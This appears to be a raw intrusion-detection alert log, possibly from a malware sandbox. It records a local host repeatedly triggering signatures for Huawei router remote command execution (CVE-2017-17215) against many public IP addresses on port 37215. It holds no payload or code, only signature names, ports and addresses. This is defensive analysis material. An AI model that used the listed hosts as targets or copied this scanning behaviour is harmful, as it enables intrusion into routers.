                                                    07/10/24-08:26:59.865437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4342037215192.168.2.14134.106.24.212
                                                    07/10/24-08:27:22.838932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822037215192.168.2.14157.52.59.246
                                                    07/10/24-08:26:41.554449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6063437215192.168.2.14157.168.138.133
                                                    07/10/24-08:26:22.203668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4842437215192.168.2.1441.194.162.254
                                                    07/10/24-08:26:25.467339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5436037215192.168.2.14157.195.241.167
                                                    07/10/24-08:26:28.773956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164037215192.168.2.1441.70.214.243
                                                    07/10/24-08:26:55.350544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772037215192.168.2.14157.28.178.44
                                                    07/10/24-08:26:23.293850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5307037215192.168.2.1483.141.137.136
                                                    07/10/24-08:26:29.776288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5796637215192.168.2.14195.88.11.252
                                                    07/10/24-08:26:20.145425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777037215192.168.2.1420.105.231.50
                                                    07/10/24-08:26:43.766765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4844237215192.168.2.14197.97.24.25
                                                    07/10/24-08:26:38.529678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3593637215192.168.2.14157.196.194.93
                                                    07/10/24-08:27:10.648060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759437215192.168.2.1441.14.95.188
                                                    07/10/24-08:27:20.478672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3609637215192.168.2.1441.182.166.185
                                                    07/10/24-08:26:26.504938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373637215192.168.2.14157.170.82.109
                                                    07/10/24-08:26:13.666761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222837215192.168.2.14157.109.246.76
                                                    07/10/24-08:27:05.064753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5234837215192.168.2.142.147.63.202
                                                    07/10/24-08:26:41.602789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5855237215192.168.2.1441.121.58.203
                                                    07/10/24-08:27:02.789952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870037215192.168.2.1441.227.250.112
                                                    07/10/24-08:27:34.124417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3383437215192.168.2.141.132.53.84
                                                    07/10/24-08:26:23.297674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433437215192.168.2.14157.125.143.228
                                                    07/10/24-08:26:14.757034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4518837215192.168.2.14157.22.66.182
                                                    07/10/24-08:26:13.790493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212837215192.168.2.14157.160.107.146
                                                    07/10/24-08:26:59.645443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475437215192.168.2.1482.132.109.224
                                                    07/10/24-08:27:02.914738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5977637215192.168.2.14157.110.188.7
                                                    07/10/24-08:27:28.169608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745037215192.168.2.14157.123.100.91
                                                    07/10/24-08:27:10.558615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5512837215192.168.2.1441.187.189.133
                                                    07/10/24-08:27:23.947908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918837215192.168.2.1441.103.155.35
                                                    07/10/24-08:26:51.997366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3334437215192.168.2.14157.254.44.225
                                                    07/10/24-08:27:24.985108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812837215192.168.2.14193.225.26.244
                                                    07/10/24-08:27:27.159705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4989837215192.168.2.1448.220.245.196
                                                    07/10/24-08:27:23.500429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235837215192.168.2.14197.251.140.96
                                                    07/10/24-08:26:34.245284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4288437215192.168.2.14197.208.169.37
                                                    07/10/24-08:26:59.780112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3973037215192.168.2.1441.126.51.139
                                                    07/10/24-08:26:28.757409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5035637215192.168.2.1419.208.17.9
                                                    07/10/24-08:26:29.831965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5254037215192.168.2.14197.185.150.41
                                                    07/10/24-08:26:34.255855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533437215192.168.2.14157.20.135.251
                                                    07/10/24-08:27:17.102138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4151037215192.168.2.14197.70.164.141
                                                    07/10/24-08:26:26.564107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5196837215192.168.2.1441.192.49.90
                                                    07/10/24-08:26:49.755286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364837215192.168.2.1441.192.60.196
                                                    07/10/24-08:26:14.781247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000437215192.168.2.14157.112.111.11
                                                    07/10/24-08:27:30.460852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3489437215192.168.2.14104.245.33.223
                                                    07/10/24-08:26:20.186875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434037215192.168.2.1441.124.198.41
                                                    07/10/24-08:27:23.969982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5936037215192.168.2.14151.69.83.156
                                                    07/10/24-08:27:32.507738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3859637215192.168.2.1458.254.254.244
                                                    07/10/24-08:27:17.054152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4638237215192.168.2.1441.223.14.126
                                                    07/10/24-08:27:24.941160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4712237215192.168.2.14197.183.233.137
                                                    07/10/24-08:27:33.755153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785037215192.168.2.1440.227.174.4
                                                    07/10/24-08:26:15.840118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495437215192.168.2.14126.171.171.250
                                                    07/10/24-08:27:24.867570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4193037215192.168.2.1431.40.194.106
                                                    07/10/24-08:26:48.026020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3375437215192.168.2.14197.232.142.73
                                                    07/10/24-08:27:22.749438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3417437215192.168.2.14177.99.133.145
                                                    07/10/24-08:26:43.851748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286037215192.168.2.1441.89.142.200
                                                    07/10/24-08:26:13.803264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869637215192.168.2.14137.185.141.155
                                                    07/10/24-08:26:15.867804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6070037215192.168.2.1441.66.30.34
                                                    07/10/24-08:26:29.875602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772437215192.168.2.14197.200.106.185
                                                    07/10/24-08:26:43.611874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460637215192.168.2.14157.19.254.48
                                                    07/10/24-08:26:55.426647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4998237215192.168.2.1441.109.84.161
                                                    07/10/24-08:26:29.847797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886237215192.168.2.1441.27.121.32
                                                    07/10/24-08:27:32.572327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927837215192.168.2.14157.186.184.81
                                                    07/10/24-08:26:38.657439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433637215192.168.2.1441.197.67.7
                                                    07/10/24-08:27:13.834773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400637215192.168.2.14157.252.219.91
                                                    07/10/24-08:27:22.794160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523237215192.168.2.14197.185.253.207
                                                    07/10/24-08:27:33.952249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3375437215192.168.2.14197.242.85.247
                                                    07/10/24-08:26:57.515772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4042437215192.168.2.14141.32.201.207
                                                    07/10/24-08:26:25.493700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3643837215192.168.2.14180.48.61.3
                                                    07/10/24-08:26:18.027188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008637215192.168.2.14197.106.24.5
                                                    07/10/24-08:26:28.763901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5968237215192.168.2.1441.208.254.34
                                                    07/10/24-08:26:11.135196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4341837215192.168.2.14197.107.22.161
                                                    07/10/24-08:27:13.879681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370237215192.168.2.1441.255.1.82
                                                    07/10/24-08:26:25.456232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5018637215192.168.2.1441.175.166.139
                                                    07/10/24-08:27:07.350674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998837215192.168.2.1441.178.95.171
                                                    07/10/24-08:26:20.155412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485237215192.168.2.14157.99.29.50
                                                    07/10/24-08:26:59.605859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3342637215192.168.2.14197.10.247.163
                                                    07/10/24-08:26:36.411505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5226637215192.168.2.14145.174.146.149
                                                    07/10/24-08:27:31.559678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282037215192.168.2.14143.91.85.137
                                                    07/10/24-08:26:47.941431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819237215192.168.2.1441.159.162.222
                                                    07/10/24-08:26:25.519002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5272637215192.168.2.14194.142.132.126
                                                    07/10/24-08:26:22.227623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4777437215192.168.2.1441.166.76.249
                                                    07/10/24-08:26:49.850247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388237215192.168.2.14157.118.124.248
                                                    07/10/24-08:27:20.513537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822837215192.168.2.14197.84.253.18
                                                    07/10/24-08:27:08.415225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837837215192.168.2.1441.182.242.35
                                                    07/10/24-08:27:27.143862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3880837215192.168.2.14197.24.43.210
                                                    07/10/24-08:26:42.177272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332837215192.168.2.1441.253.235.116
                                                    07/10/24-08:26:29.856939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4355037215192.168.2.14157.163.140.43
                                                    07/10/24-08:27:07.369832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553037215192.168.2.14176.97.105.136
                                                    07/10/24-08:27:05.097626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831837215192.168.2.14183.221.146.173
                                                    07/10/24-08:26:42.180724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4856037215192.168.2.14197.151.197.29
                                                    07/10/24-08:26:49.761554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3592437215192.168.2.14197.117.135.131
                                                    07/10/24-08:26:18.008583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6001837215192.168.2.1454.145.99.45
                                                    07/10/24-08:26:20.189377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595637215192.168.2.14157.11.99.109
                                                    07/10/24-08:26:43.584694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3386837215192.168.2.14157.240.183.76
                                                    07/10/24-08:26:29.861363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317837215192.168.2.1488.236.223.243
                                                    07/10/24-08:26:22.213978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479437215192.168.2.14170.9.41.10
                                                    07/10/24-08:26:15.871389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669637215192.168.2.1441.167.175.43
                                                    07/10/24-08:26:17.949707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4765437215192.168.2.1441.66.215.84
                                                    07/10/24-08:26:55.400529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3467237215192.168.2.14157.187.75.213
                                                    07/10/24-08:27:27.122406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6088837215192.168.2.1441.88.168.189
                                                    07/10/24-08:26:26.483196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123037215192.168.2.1441.91.124.245
                                                    07/10/24-08:27:13.905026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652837215192.168.2.14197.95.196.246
                                                    07/10/24-08:26:38.637224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931837215192.168.2.1441.100.142.177
                                                    07/10/24-08:26:25.502645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4099437215192.168.2.14217.188.221.83
                                                    07/10/24-08:26:55.379647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5776237215192.168.2.14197.251.125.205
                                                    07/10/24-08:26:13.828221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429237215192.168.2.1441.235.102.19
                                                    07/10/24-08:26:25.473474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717037215192.168.2.14197.44.157.83
                                                    07/10/24-08:26:14.763197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5116237215192.168.2.14157.138.129.0
                                                    07/10/24-08:26:36.323441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831037215192.168.2.14133.192.103.126
                                                    07/10/24-08:26:17.957871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356037215192.168.2.1441.186.42.150
                                                    07/10/24-08:27:08.360438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775437215192.168.2.1434.9.73.38
                                                    07/10/24-08:26:57.654804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132837215192.168.2.1462.69.186.213
                                                    07/10/24-08:27:13.921196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4086637215192.168.2.14197.74.164.68
                                                    07/10/24-08:27:19.290151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5366437215192.168.2.14157.215.153.102
                                                    07/10/24-08:27:11.476399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956037215192.168.2.1476.8.187.115
                                                    07/10/24-08:26:14.626049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3495637215192.168.2.14157.118.78.26
                                                    07/10/24-08:26:43.864368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4719837215192.168.2.1441.26.42.159
                                                    07/10/24-08:26:59.654831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547237215192.168.2.14157.6.241.0
                                                    07/10/24-08:27:00.565253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931037215192.168.2.14157.48.32.242
                                                    07/10/24-08:27:31.522648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165037215192.168.2.14194.86.237.113
                                                    07/10/24-08:26:59.602276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703837215192.168.2.14197.200.42.152
                                                    07/10/24-08:27:17.041002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3889237215192.168.2.14103.195.25.107
                                                    07/10/24-08:26:26.581833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959437215192.168.2.14197.51.246.85
                                                    07/10/24-08:26:51.932459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933437215192.168.2.14197.36.207.103
                                                    07/10/24-08:27:08.297921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753237215192.168.2.14197.123.164.222
                                                    07/10/24-08:27:02.730026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979037215192.168.2.14197.115.212.222
                                                    07/10/24-08:27:22.906366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870037215192.168.2.14199.54.217.95
                                                    07/10/24-08:27:34.117874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4382237215192.168.2.14157.186.46.214
                                                    07/10/24-08:27:20.515408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731437215192.168.2.14197.231.178.104
                                                    07/10/24-08:27:13.942204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5603637215192.168.2.14157.14.146.37
                                                    07/10/24-08:27:19.198871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590837215192.168.2.1441.193.42.162
                                                    07/10/24-08:27:23.914587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5284437215192.168.2.1441.179.84.199
                                                    07/10/24-08:27:10.609289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362037215192.168.2.14157.184.131.245
                                                    07/10/24-08:26:42.375701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882637215192.168.2.1441.3.125.185
                                                    07/10/24-08:27:33.861277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092837215192.168.2.14157.219.183.247
                                                    07/10/24-08:26:36.383981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4029037215192.168.2.1441.67.174.169
                                                    07/10/24-08:27:08.369080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4619837215192.168.2.14197.244.147.109
                                                    07/10/24-08:27:31.457476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4274037215192.168.2.14157.43.73.192
                                                    07/10/24-08:26:59.757795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065837215192.168.2.14197.22.204.61
                                                    07/10/24-08:27:27.047599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687637215192.168.2.14197.44.83.209
                                                    07/10/24-08:26:23.356000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098437215192.168.2.1441.215.174.146
                                                    07/10/24-08:26:25.479456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5988237215192.168.2.14197.60.232.61
                                                    07/10/24-08:27:10.717127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4762437215192.168.2.14157.24.25.240
                                                    07/10/24-08:26:23.344718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494237215192.168.2.1441.231.96.232
                                                    07/10/24-08:27:30.525372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983837215192.168.2.14157.179.55.147
                                                    07/10/24-08:27:33.880415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398837215192.168.2.14197.232.138.204
                                                    07/10/24-08:26:33.260181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658237215192.168.2.14197.125.182.198
                                                    07/10/24-08:27:30.514839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617437215192.168.2.1441.186.151.41
                                                    07/10/24-08:26:22.298468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941837215192.168.2.14157.193.111.159
                                                    07/10/24-08:27:22.777206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5168837215192.168.2.14157.157.55.156
                                                    07/10/24-08:26:53.180230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4380637215192.168.2.14197.122.169.144
                                                    07/10/24-08:26:28.895682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974037215192.168.2.14197.89.161.73
                                                    07/10/24-08:26:34.208199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377237215192.168.2.14157.103.23.8
                                                    07/10/24-08:26:20.104603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5685637215192.168.2.14197.16.247.4
                                                    07/10/24-08:26:29.781347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926837215192.168.2.1481.125.251.14
                                                    07/10/24-08:27:07.388758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669637215192.168.2.14116.29.48.243
                                                    07/10/24-08:26:23.344718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4679437215192.168.2.1441.185.199.211
                                                    07/10/24-08:27:08.349931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460037215192.168.2.1441.233.145.84
                                                    07/10/24-08:27:14.834024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572637215192.168.2.14197.175.159.164
                                                    07/10/24-08:26:47.976688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5814437215192.168.2.1450.4.216.26
                                                    07/10/24-08:26:33.251804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174237215192.168.2.14157.224.217.244
                                                    07/10/24-08:27:19.182366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4007237215192.168.2.14210.39.247.137
                                                    07/10/24-08:26:51.961222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150637215192.168.2.14157.110.198.120
                                                    07/10/24-08:26:14.825440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3426837215192.168.2.1441.248.100.252
                                                    07/10/24-08:26:26.564654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985037215192.168.2.14197.19.34.87
                                                    07/10/24-08:26:52.021127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834237215192.168.2.1454.153.71.159
                                                    07/10/24-08:26:43.919816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598037215192.168.2.14157.99.212.107
                                                    07/10/24-08:27:33.734859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384637215192.168.2.1457.3.183.164
                                                    07/10/24-08:26:42.353894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932837215192.168.2.14157.128.202.228
                                                    07/10/24-08:27:13.721350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5779837215192.168.2.14196.244.235.234
                                                    07/10/24-08:27:27.147425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298437215192.168.2.14122.155.134.109
                                                    07/10/24-08:26:47.857207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048437215192.168.2.14157.94.189.181
                                                    07/10/24-08:27:22.535302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992437215192.168.2.14197.40.234.149
                                                    07/10/24-08:27:33.922247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998037215192.168.2.1489.89.131.93
                                                    07/10/24-08:26:13.767767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5465637215192.168.2.1441.95.26.48
                                                    07/10/24-08:26:43.910863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4116437215192.168.2.14197.62.146.202
                                                    07/10/24-08:26:22.283618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576637215192.168.2.14157.114.147.148
                                                    07/10/24-08:26:59.805641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027437215192.168.2.14197.153.196.32
                                                    07/10/24-08:27:19.204626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4290237215192.168.2.1441.33.217.97
                                                    07/10/24-08:26:34.208833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210037215192.168.2.14157.120.31.43
                                                    07/10/24-08:27:11.550512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5776037215192.168.2.1441.85.141.30
                                                    07/10/24-08:27:30.544401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5120437215192.168.2.14157.89.230.223
                                                    07/10/24-08:27:32.526946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4696237215192.168.2.14157.104.52.53
                                                    07/10/24-08:26:22.218292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5972837215192.168.2.14111.169.58.168
                                                    07/10/24-08:27:16.979192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330437215192.168.2.1458.130.202.103
                                                    07/10/24-08:27:31.555849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4565037215192.168.2.1482.75.119.86
                                                    07/10/24-08:26:41.335427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5561037215192.168.2.14197.201.95.42
